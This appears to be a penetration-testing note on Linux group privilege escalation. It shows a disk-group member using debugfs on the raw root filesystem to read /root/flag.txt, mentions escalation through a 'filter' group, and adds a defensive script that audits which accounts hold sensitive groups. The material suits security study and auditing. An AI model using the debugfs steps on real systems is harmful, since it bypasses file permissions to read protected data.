Groups

Disk

The disk group in Linux is a privileged system group intended to grant access to raw disk devices, like /dev/sda, /dev/sdb, etc. It allows users to perform low-level operations on storage devices, such as partitioning, formatting, mounting/unmounting, etc.

Membership in the disk group is highly sensitive — users with this access can read or modify any data on the system, bypassing file permissions entirely.

# Confirm group membership
ian@DANTE-NIX07:~$ id
uid=1001(ian) gid=1001(ian) groups=1001(ian),6(disk)

# Identify the root file system (/)
ian@DANTE-NIX07:~$ df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/sda5        14G  7.9G  5.2G  61% /

# Open the block device
ian@DANTE-NIX07:~$ debugfs /dev/sda5
debugfs 1.45.5 (07-Jan-2020)
No entry for terminal type "xtrem";
using dumb terminal settings.

# Failed attempt to create a directory
debugfs:  mkdir test
mkdir: Filesystem opened read/only

# Read a root file 
debugfs:  cat /root/flag.txt
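
For auditing this exposure, the following added example (not part of the original notes) lists every account that holds a sensitive group such as disk, either as a supplementary member or as its primary group, which the member list in /etc/group alone does not show. The function names, the allowlist argument and the sample passwd/group entries are hypothetical and constructed for illustration.

```shell
#!/bin/sh
# Added audit example: find accounts holding a sensitive group (e.g. disk).
# Usage: group_holders GROUP [PASSWD_FILE] [GROUP_FILE]
group_holders() {
    grp=$1
    passwd_file=${2:-/etc/passwd}
    group_file=${3:-/etc/group}
    # Resolve the numeric GID; if the group does not exist, report nothing.
    gid=$(awk -F: -v g="$grp" '$1 == g { print $3; exit }' "$group_file")
    [ -n "$gid" ] || return 0
    {
        # Supplementary members: 4th field of the group entry, comma separated.
        awk -F: -v g="$grp" '$1 == g && $4 != "" {
            n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i] }' "$group_file"
        # Primary holders: accounts whose passwd GID field equals the group GID.
        awk -F: -v gid="$gid" '$4 == gid { print $1 }' "$passwd_file"
    } | sort -u
}

# Print holders that are not on a space-separated allowlist.
# Usage: unexpected_holders GROUP "ALLOWED NAMES" [PASSWD_FILE] [GROUP_FILE]
unexpected_holders() {
    grp=$1; allow=" $2 "; shift 2
    group_holders "$grp" "$@" | while read -r user; do
        case "$allow" in
            *" $user "*) ;;          # approved account, skip
            *) echo "$user" ;;       # needs review
        esac
    done
}

# Constructed sample files (not from a real host): ian holds disk as a
# supplementary group, backup holds it as primary group.
make_sample() {
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
ian:x:1001:1001::/home/ian:/bin/bash
backup:x:34:6:backup:/var/backups:/usr/sbin/nologin
EOF
    cat > "$1/group" <<'EOF'
root:x:0:
disk:x:6:ian
ian:x:1001:
EOF
}

# Demo on the constructed data: report every disk holder (empty allowlist).
tmp=$(mktemp -d); make_sample "$tmp"
unexpected_holders disk "" "$tmp/passwd" "$tmp/group"
rm -rf "$tmp"
```

Called without file arguments, `group_holders disk` reads the local /etc/passwd and /etc/group; accounts resolved through other NSS sources are not covered by this file-based check.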

Filter

The filter group is usually a custom group, not a default Linux group, and it’s commonly used to manage permissions around mail content filtering components. It can be assigned write access to sensitive files, such as disclaimer files, which can lead to privilege escalation (PE).
